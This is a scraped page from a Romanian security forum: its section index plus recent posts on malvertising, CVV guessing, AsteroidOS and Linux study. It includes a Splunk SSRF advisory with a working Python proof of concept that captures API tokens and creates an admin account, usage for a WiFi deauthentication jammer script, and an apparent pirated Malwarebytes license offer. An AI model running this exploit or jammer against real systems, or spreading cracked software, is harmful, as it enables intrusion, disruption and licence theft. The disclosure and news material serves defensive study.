1. Informatii generale

    1. Anunturi importante

      Anunturile importante si regulile forumului. Cititi regulamentu​l inainte de a posta.

    2. Bine ai venit

      Bine ati venit pe forumul Romanian Security Team, aici va puteti prezenta (optional)

    3. Proiecte RST

      Aici veti putea gasi toate programele, tutorialele, metodele si exploiturile create de catre membrii RST

  2. Sectiunea tehnica

    1. Exploituri

      Cele mai noi exploituri, POC-uri sau shellcode-uri

    2. Challenges

      Challenge-uri - Wargames, pentru amatorii CTF-urilor

    3. Bug Bounty

      Categorie destinata discutiilor referitoare la site-urile care au un program Bug Bounty in desfasurare prin care rasplatesc persoanele care le raporteaza vulnerabilitati

    4. Programare

      Coltul programatorilor: C/C++, Visual Basic, .NET, Java, ASM, Shell scripting, Perl, Python

    5. Reverse engineering & exploit development

      Tutoriale despre analiza malware, sample-uri, cod sursa, programe utile, reverse engineering si exploit development

    6. Mobile phones

      Discutii despre telefoane mobile, root-ing, jailbreak-ing etc.

    7. Sisteme de operare si discutii hardware

      Discutii in materie hardware, windows, unix, bsd etc.

    8. Electronica

      Discutii generale despre electronica

    9. Wireless Pentesting

      Wardriving area, WiFi, Bluetooth si GSM hacking

    10. 8,414
  3. Tutoriale

  4. Programe

    1. Programe hacking

      Postati aici utilitare cum ar fi sniffere, bruteforcers, fuzzers etc. Nu faceti cereri aici.

    2. Programe securitate

      Postati aici programe cum ar fi firewall-uri, antivirusi si programe similare

    3. Programe utile

      Programe ce nu se incadreaza in celelalte sectiuni: hack sau securitate

    4. Free stuff

      Diverse lucruri utile, fiind excluse root-uri, SMTP-uri, VPS-uri etc.

  5. Discutii generale

    1. RST Market

      Orice vanzare/cumparare care are legatura cu frauda online/bancara sau access neautorizat este penalizata cu ban permanent!  Minim 50 de posturi pentru acces!

    2. Off-topic

      Discutii pe diverse teme, discutii care nu se incadreaza la celalalte categorii. Doar discutii din domeniul IT!

    3. Discutii incepatori

      Daca esti incepator, ai o intrebare simpla sau vrei sa stii mai multe despre un domeniu, aici e sectiunea potrivita

    4. Stiri securitate

      Stiri din domeniul securitatii IT

    5. Ajutor

      Ai o problema si te putem ajuta? Posteaza aici.

    6. Cereri

      Cererile se fac doar aici, indiferent de subiect.

    7. Sugestii

      Vreti un forum mai bun? Orice sugestie din partea voastra va fi analizata. Doar sugestii pentru site/forum.

    8. Linkuri

      Postati aici doar linkurile despre securitate!

    9. Cosul de gunoi

      Toate topicurile care au deviat de la raspuns vor fi mutate aici.

  • Who's Chatting

  • Topics

  • Posts

    • Malwarebytes Premium Multilingual + License Key
      FiLE SiZE: 71.26 MB


      Malwarebytes Premium 3 - Makes antivirus obsolete! Four layers of malware-crushing tech. Smarter detection. Specialized ransomware protection. It's the security youâ™ve been looking for.

      Real-time protection
      Detects malware automatically, before it can infect.

      Shields vulnerable systems and software from exploit attacks.

      Stops ransomware attacks before your data is held hostage.

      Malicious website protection
      Prevents access to and from known malicious webpages.

      Detects and removes malware and advanced threats.

      Removes rootkits and repairs the files they damage.

      What it does for you:

      Protects you from advanced threats
      Detects and removes malware in real-time with advanced anti-malware, anti-spyware, and anti-rootkit technology. Scans for the newest and most dangerous threats automatically, so youâ™re protected without having to even think about it.

      Protects your files from being locked and held for ransom
      Stops unknown and known ransomware with proprietary next-gen technology that works proactively to shield your files. This is a powerful, comprehensive defense that blocks ransomware, and not a simple decryption tool. So youâ™re protected from tomorrowâ™s "Ransomware Attack!" headlines today.

      Prevents your programs from being used against you
      Wraps your browser and software programs in four layers of defense, stopping attacks that use vulnerabilities in those programs to infect your computer.

      Protects you from fake and infected websites
      Detects and prevents contact with fake websites and malicious links. You are proactively protected from downloading malware, hacking attempts, and infected advertising. Worried about wandering into a "bad" Internet neighborhood? Now you donâ™t have to be.

      Scans faster, scans smarter
      Lightning-fast Hyper Scan mode targets only the threats that are currently active. Faster analysis. Still gets results. Run a scan in the background while you boot up your favorite game. It's done by the time you're ready to play.

      What's New ?

      Software Requirements:
      • Windows 10 (32/64-bit)
      • Windows 8.1 (32/64-bit)
      • Windows 8 (32/64-bit)
      • Windows 7 (32/64-bit)
      • Windows Vista (Service Pack 1 or later, 32/64-bit)*
      • Windows XP (Service Pack 3 or later, 32-bit only)*
      • Active Internet connection


      1 LiNKS | Part 1 GB | NO CRC | NO PASS

      If you like my post, don't forget to say Thanks and help keep the thread alive. Thanks You!
    • Stegano exploit kit poisoning pixels BY Please login or register to see this link.  POSTED 6 DEC 2016 - 12:00PM     ESET researchers have discovered a new exploit kit spreading via malicious ads on a number of reputable news websites, each with millions of visitors daily. Since at least the beginning of October 2016, the bad guys have been targeting users of Internet Explorer and scanning their computers for vulnerabilities in Flash Player. Exploiting these flaws in the code, they have been attempting to download and execute various types of malware. The attacks fall into the category of so-called malvertising due to the fact that the malicious code has been distributed through advertising banners. To make things worse, the attackers responsible are using stealthy, even paranoid, techniques, which makes analysis quite complicated and has thus necessitated an Please login or register to see this link. .   I asked Robert Lipovsky, one of ESET’s senior malware researchers, to give us a less technical overview of the case. What does your discovery mean for internet users? It means that there are advertising banners with “poisoned pixels” leading to a new exploit kit, intended to enable the bad guys to remotely install malware onto victims’ computers. The victim doesn’t even need to click on the malicious ad content; all it takes is to visit a website displaying it. If the victim’s computer runs a vulnerable version of Flash Player, the machine will be compromised via an exploited vulnerability automatically. After that, the bad guys have all they need to download and execute the malware of their choice. Some of the payloads we analyzed include banking trojans, backdoors and spyware, but the victims could end up facing a nasty ransomware attack, for example. Once again this threat shows how important it is to have your software fully patched and to be protected by a reputable security solution. In this particular case, either of these measures fully protects you from this specific attack. Where are the poisoned pixels in this?   Well, the name “Stegano” refers to Please login or register to see this link. , which is a technique the bad guys used to hide parts of their malicious code in the pixels of the advertisements’ banners. Specifically, they hide it in the parameters controlling the transparency of each pixel. This makes only minor changes to the (color) tone of the picture, making the changes effectively invisible to the naked eye and so unnoticed by the potential victim. How does the attack work? I believe the following scheme is the best way to explain what is happening in this case:     Your analysis shows that the creators of the Stegano exploit kit are trying hard to stay unseen. What makes them so paranoid? Attackers have succeeded in circumventing the countermeasures designed to uncover and block malicious content on advertising platforms, which has resulted in legitimate websites unknowingly serving infected content to millions of potential victims. On top of that, the malicious version of the ad is served only to a specific target group, selected by the attackers’ server. The decision-making logic behind the choice of target is unknown and this helps the bad guys to go further in dodging suspicion on the advertising platforms’ side. But those are not the only reasons why they try hard to stay stealthy – and that’s where the attackers get really paranoid. The crooks behind the Stegano exploit kit are also trying to stay off the radar of experienced cybersecurity research teams hunting for malware. Hiding code in the pixels would not be enough to escape this kind of attention, so they have implemented a series of checks to detect whether the code is being surveilled. If any kind of surveillance is detected, the exploit kit’s activities simply stop and no malicious content is served. How do they know when the code is being observed?   The exploit kit mainly tries to detect whether or not it is sitting in a sandbox, or if it is running on a virtual machine that was created for detection purposes. Also, the malware checks for any security software that might be present and sends this information to its operators. Can you say how many users have already seen these banners with poisoned pixels? Our detection systems show that in the last two months the malicious ads have been displayed to more than a million users on several very popular websites. Bear in mind, this is a rather conservative estimate based only on our own telemetry from users participating in ESET LiveGrid®. After all, the visitor counts of some of these websites are in the millions daily. Can you be more specific? Which websites were affected?   The purpose of this research is to shed light on the activities of the bad guys and to make users safe from this threat. In this case, disclosure of the websites known to have been affected wouldn’t add any extra value in this regard. On the contrary, it could provide a false sense of security to those who have not visited these sites, as the banners could have appeared on practically any website that displays ads. We should also mention the reputational harm this could inflict on victimized pages, especially since there is nothing they could have done to prevent these attacks, as the targeted ad space isn’t completely under their control. What should I do to stay protected from exploit kit attacks? First of all, let me highlight again that those who are diligent in protecting their computers, are safe from these specific attacks. Keeping both the system and all applications patched and using a reliable internet security solution are strong precautions that help prevent such attacks. However, for unwary users, malvertising poses a serious threat, and their only hope is that malicious banners won’t make it onto websites they visit.   Sursa: Please login or register to see this link.
    • Do NOT try this!   How to guess credit card security codes by Please login or register to see this link.     If you’ve ever used your credit card online, or over the phone, you’ve probably been asked for something known informally as the “short code” or “security code”. That’s usually a three-digit number physically printed (but not embossed) at the right hand end of the signature strip on the back of your card. Three digits don’t sound enough to make Please login or register to see this link. , and in normal circumstances they wouldn’t be. But for what are known as card-not-present transctions, the CVV, or Card Verification Value as it is commonly known, provides a handy degree of protection against one of the most common sorts of credit card fraud, namely skimming.
      Please login or register to see this link. Sophos Home Skimming is where the crooks use a booby-trapped card reader, for example Please login or register to see this link.  on an ATM, or cunningly squeezed into the card slot on a payment terminal, to read and record the magnetic stripe on your card. Even if you have a Chip and PIN card, the magstripe contains almost enough information for a crook to convince a website they have your card. For example, your name as it appears on the front of the card, the “long code”, usually 16 digits across the face of the card, and the expiry date are all there on the magstripe, ready to be copied surreptitiously and used on the web.   The CVV therefore acts as a very low-tech barrier to card-not-present fraud, because most websites also require you to type in the CVV, which is not stored on the magstripe and therefore can’t be skimmed. Of course, there are numerous caveats here, including:   The vendor mustn’t store your CVV after the transaction is complete. The security usefulness of the CVV depends on it never lying around where it could subsequently fall foul of cyberthieves. The payment processor mustn’t allow too many guesses at your CVV. With unlimited guesses and a three-digit code, even a crook working entirely by hand could try all the possibilities with a few hours. Guessing CVVs Researchers at Newcastle University in the UK recently decided to see just how effectively the second caveat was enforced, by Please login or register to see this link. . The initial findings were encouraging: after a few guesses on the same website, they’d end up locked out and unable to go and further. Then they tried what’s called a distributed attack, using a program to submit payment requests automatically to lots of websites at the same time. You can see where this is going.   If each website gives you five guesses, then with 200 simultaneous guesses on a range of different websites, you can get through 1000 guesses (200 × 5) in quick order without triggering a block on any of the sites. And with 1000 guesses, you can cover all CCV possibilities from 000 to 999, stopping when you succeed. Then you can go to that 251st site and order just about whatever you like, because you’ve “solved” the CVV without ever actually seeing the victim’s card.   In other words, you’d expect the payment processor’s back-end servers to keep track not just of the number of CVV guesses from each site, but the total number of guesses since your last successful purchase from any site. According to Newcastle University, Mastercard stopped this sort of distributed guessing, but Visa did not. Should you worry? Considering how much credit card fraud happens without any need for CVV-guessing tricks like this, we don’t think this is a signal to give up online purchases entirely this festive season. Afte all, if any of the sites or services you used recently kept your CVV, even if only to write it down temporarily while processing your transaction, you’re exposed anyway, so CVVs aren’t a significant barrier to determined crooks. And if you’ve ever put your card details into a hacked or fraudulent website – even (or perhaps especially) if the transaction was never finalised – then the crooks probably already have everything they need to clone your card. What to do? A few simple precautions will help, regardless of your card provider: Don’t let your card out of your sight. Crooks working out of sight, even for just a few seconds, can skim your card easily simply by running it through two readers. They can also snap a sneaky picture of the back of the card to record both your signature and the CVV. Try to use the Chip and PIN slot when paying in person. Most chip readers only require you to insert your card far enough to connect up to the chip. This leaves most of the magstripe sticking out, making Please login or register to see this link. . If in doubt, find another retailer or ATM. Most ATMs still require you to insert your whole card, and can therefore be fitted with glued-on magstripe skimmers. If you aren’t sure, why not get hold and Please login or register to see this link. ? Skimmers often don’t feel right, because they aren’t part of the original ATM. Stick to online retailers you trust. Check the address bar of the payment page, make sure you’re on an encrypted (HTTPS) site, and if you see any Please login or register to see this link. , bail out immediately. Keep an eye on your statements. If your bank has a service to send you a message notifying you when transactions take place, consider turning it on.   Please login or register to see this link.
      Please login or register to see this link.   Sursa: Please login or register to see this link.
    • From: Francesco Oddo <francesco.oddo () security-assessment com> Date: Fri, 9 Dec 2016 14:54:02 +1300 ( , ) (, . '.' ) ('. ', ). , ('. ( ) ( (_,) .'), ) _ _, / _____/ / _ \ ____ ____ _____ \____ \==/ /_\ \ _/ ___\/ _ \ / \ / \/ | \\ \__( <_> ) Y Y \ /______ /\___|__ / \___ >____/|__|_| / \/ \/.-. \/ \/:wq (x.0) '=.|w|.=' _=''"''=. presents.. Splunk Enterprise Server-Side Request Forgery Affected versions: Splunk Enterprise <= 6.4.3 PDF: +-----------+ |Description| +-----------+ The Splunk Enterprise application is affected by a server-side request forgery vulnerability. This vulnerability can be exploited by an attacker via social engineering or other vectors to exfiltrate authentication tokens for the Splunk REST API to an external domain. +------------+ |Exploitation| +------------+ ==Server-Side Request Forgery== A server-side request forgery (SSRF) vulnerability exists in the Splunk Enterprise web management interface within the Alert functionality. The application parses user supplied data in the GET parameter ‘alerts_id’ to construct a HTTP request to the splunkd daemon listening on TCP port 8089. Since no validation is carried out on the parameter, an attacker can specify an external domain and force the application to make a HTTP request to an arbitrary destination host. The issue is aggravated by the fact that the application includes the REST API token for the currently authenticated user within the Authorization request header. This vulnerability can be exploited via social engineering to obtain unauthorized access to the Splunk REST API with the same privilege level of the captured API token. [POC SSRF LINK] /en-US/alerts/launcher?*&severity=*&alerts_id=[DOMAIN]&search=test The proof of concept below can be used to listen for SSRF connections and automatically create a malicious privileged user when an administrative token is captured. [POC -] from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer import httplib import ssl import requests token = '' class MyHandler(BaseHTTPRequestHandler): def do_GET(self): global token try: token = self.headers.get('Authorization')[7:] print "[+] Captured Splunk API token from GET request" except Exception, e: print "[-] No API token captured on incoming connection..." def adminTokenNotCaptured(): global token if token: query = "/services/authentication/httpauth-tokens/" + token conn = httplib.HTTPSConnection("<SPLUNK IP>", 8089, context=ssl._create_unverified_context()) conn.putrequest("GET", query) conn.putheader("Authorization", "Splunk %s" % token) conn.endheaders() context = conn.getresponse().read() if 'userName">admin' in context: print "[+] Confirmed Splunk API token belongs to admin user" print "[+] Admin Splunk API Token: %s" % token return False else: print "[!] Splunk API token does not belong to admin user" return True def poc(): global token create_user_uri = "https://<SPLUNK IP>:8089/services/authentication/users" params = {'name': 'infosec', 'password': 'password', 'roles': 'admin'} auth_header = {'Authorization': 'Splunk %s' % token} requests.packages.urllib3.disable_warnings() response =, data=params, headers=auth_header, verify=False) if "<title>infosec" in response.content: print "[+] POC admin account 'infosec:password' successfully created" else: print "[-] No account was created" print response.content if __name__ == "__main__": try: print "[+] Starting HTTP Listener" server = HTTPServer(("", 8080), MyHandler) while adminTokenNotCaptured(): server.handle_request() poc() except KeyboardInterrupt: print "[+] Stopping HTTP Listener" server.socket.close() +----------+ | Solution | +----------+ Update to Splunk 6.5.0 or later. Full information about all patched versions are provided in the reference links below. +------------+ | Timeline | +------------+ 24/08/2016 – Initial disclosure to vendor 25/08/2016 – Vendor acknowledges receipt of the advisory and confirms vulnerability. 28/09/2016 – Sent follow up email asking for status update 30/09/2016 – Vendor replies fixes are being backported to all supported versions of the software. 10/11/2016 – Vendor releases security advisory and patched software versions 09/12/2016 – Public disclosure +------------+ | Additional | +------------+ [SPL-128840] Sursa: Please login or register to see this link.
    • New Smartwatch OS Debuts on GitHub By John P. Mello Jr. 
      Dec 9, 2016 7:00 AM PT     Can a new smartwatch operating system based on Linux breathe some new life into the smart wearables market? Florent Revest hopes so. Revest, a French computer science student, on Wednesday announced the alpha release of Please login or register to see this link. , an open source operating system that will run on several Android smartwatch models.   "Many users believe that the current proprietary platforms can not guarantee a satisfactory level of control over their privacy and hardware," noted Revest, who has been working on his OS for two years. "Hence, I noticed a need for an open wearable platform and AsteroidOS is my attempt to address this issue."   The alpha edition of AsteroidOS contains some basic apps: agenda, for scheduling events to remember; an alarm clock; a calcuator; music, for controlling the music player on a phone; a stopwatch; a timer and a weather app.     The OS will run, more or less, on the LG G Watch, LG G Urbane, Asus ZenWatch 2 and Sony Smartwatch 3, Revest noted. Bluetooth works only on the G Watch, though. Uphill Battle Launching an open source mobile operating system can be a daunting and seemingly futile task. "This has been tried repeatedly in the past and has failed," said Jack E. Gold, principal analyst at Please login or register to see this link. .   So far there's only been one open source success story in the mobile market, and that's been Android -- which eventually was consumed by Google and closed off, noted Patrick Moorhead, principal analyst at Moor Insights and Strategy. "Firefox, Meego and Ubuntu have tried this and, unfortunately, haven't met with success," he told LinuxInsider. Breaking From Past However, Revest's focus on smartwatches may give his OS a better chance of success than past open source efforts had, said Charles King, principal analyst at Please login or register to see this link. . "There's certainly no guarantee that AsteroidOS can breathe life into so stagnant a market -- but at the same time, the new OS won't encounter the barriers it would in more mature markets, such as smartphones," he told LinuxInsider. "There's a hole in the market for this," said Ross Rubin, principal analyst at Please login or register to see this link. .   "Unlike the phone and tablet market, where you can use the Android open source platform and build something based on that, there really hasn't been much for smartwatches," he told LinuxInsider. Google offers a form of Android for wearables, but it can't be modified the way the open source version of Android can. Narrow Appeal While Revest envisions growth of AsteroidOS as an open source community builds around it and it becomes compatible with more devices, broad adoption may be a long shot. Manufacturers who produce custom phones for target markets, such as low cost phones for emerging markets, might be interested in AsteroidOS, suggested Gold. However, "you can do this with Android-Linux already," he told LinuxInsider, "and with a new OS, there will be no availability of apps, so the devices will be very unattractive."   Chinese phone makers who use open source Android may use AsteroidOS to produce very inexpensive smartwatches, said Rubin, "but inexpensive smartwatches haven't been driving the market. Pebble was an inexpensive smartwatch, and look what happened to it." The early adopters of the OS will be Linux enthusiasts and hobbyists, King said. Since the OS can work on older watches, early users likely will run the software on second-hand hardware.   "That's a dynamic that drove significant early interest in Linux during the mid- to late-1990s, when people ported the OS to a wide variety of x86-based PCs and servers that were well past their prime," King recalled. Many of the initial users of AsteroidOS likely will be developers and Linux evangelists, he said. "If AsteroidOS can gain a foothold with them, it could well spark commercial interest and adoption further down the road." Pebble Crushed Revest's announcement came on the same day that news broke that one of the pioneers in the smartwatch market, Pebble, has been purchased by Fitbit, reportedly for US$40 million. Fitbit, a fitness band maker, made the purchase to acquire key personnel and intellectual property. The deal does not include Fitbit's hardware, which will be discontinued.   The smartwatch market took a tumble in the third quarter, according to Please login or register to see this link. . Shipments of wearable products were up 3.1 percent -- to 23.0 million from 22.3 million in the same quarter a year ago -- the firm reported earlier this week. "It's still early days, but we're already seeing a notable shift in the market," observed IDC Senior Research Analyst Jitesh Ubrani. "Where smartwatches were once expected to take the lead, basic wearables now reign supreme."  John Mello is a freelance technology writer and contributor to Chief Security Officer magazine. You can connect with him on Please login or register to see this link. .   Sursa: Please login or register to see this link.
    • jammer A Bash script to automate the continuous circular deauthentication of all the wifi networks in your reach I am not responsible for any misuses of the script Keep in mind that it is generally illegal to use the script at your neihborhood It is designed for pen-testing purposes It has only been tested on my two machines, so there may still be bugs that can even cause data loss That's why I suggest you take a good look at the code before you execute it There will be updates as soon as I fix something or make a nice improvement Not that anyone will see this Jammer v0.3 Usage: jammer [OPTION] ... Jam Wifi Networks That Your Wireless Card Can Reach. -d, --deauths: Set the number of deauthentications for each station. Default is 10 -y, --yes: Make 'Yes' the answer for everything the script asks -s, --endless: When reaching the end of the list, start again -f, --whitelist: A file with ESSID's to ignore during the attack -k, --keep: Keep the scan files after the script ends -n, --name: Choose the names the scan files are saved as -e, --ethernet: Set the name for the ethernet interface. Default is 'eth0' -w, --wireless: Set the name for the wireless interface. Default is 'wlan0' -h, --help: Show this help message Looking at this help message a suggested way to call the script is $ sudo ./jammer -y -s -d 20 -f whitelist.txt   Sursa: Please login or register to see this link.
    • Invata mai bine cu ce se mananca linux. Arhitecturi, kernel modules, kernel sysinternals, securitate, daemoni, structura si pe cat posibil instaleaza-ti aplicatiile din surse la inceput. Cel putin, orienteaza-te sa faci lucruri la inceput. Nu iti pierde timpul cu stricatul.